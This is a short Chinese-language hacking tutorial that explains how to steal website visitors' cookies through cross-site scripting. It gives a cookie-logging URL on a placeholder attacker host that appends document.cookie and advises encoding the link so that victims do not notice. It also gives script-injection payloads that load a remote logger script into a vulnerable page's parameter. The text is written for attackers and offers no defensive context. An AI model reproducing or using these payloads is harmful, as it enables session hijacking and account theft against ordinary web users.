上传所有文件到服务器 并且根据你的需要调整 log.js , 然后以如下的方式去发送你的记录cookies的链接:
http://attacker/logger/log.php?cookie='+document.cookie
对 log.php? 之后的部分进行加密或者编码以使其他人不去注意,增大欺骗性。
如果你基本不懂javascript,你也可以使用通过使用 log.js file 来自动窃取cookies.
你只需使用 <script src="http://attacker/logger/log.js></script>标签,你将替换你的主机为目标主机。
示例:
如果你在某个网站发现了一个 Xss漏洞, 那么
x.com/x.php?x=<script>alert('xss')<script>
或者
x.com/x.php?x="><script>alert('xss')</script>
你只需替换script后面的部分
比如
<script src="http://attacker/logger/log.js">
然后它将重定向用户到你的logger,
你可以根据你的需要选择你认为容易的方法.
x就是可能存在跨站脚本漏洞的站点。
现在它将在客户端自动执行 js ,而你将获得受害者的 Cookies
来源于天阳技术联盟
|
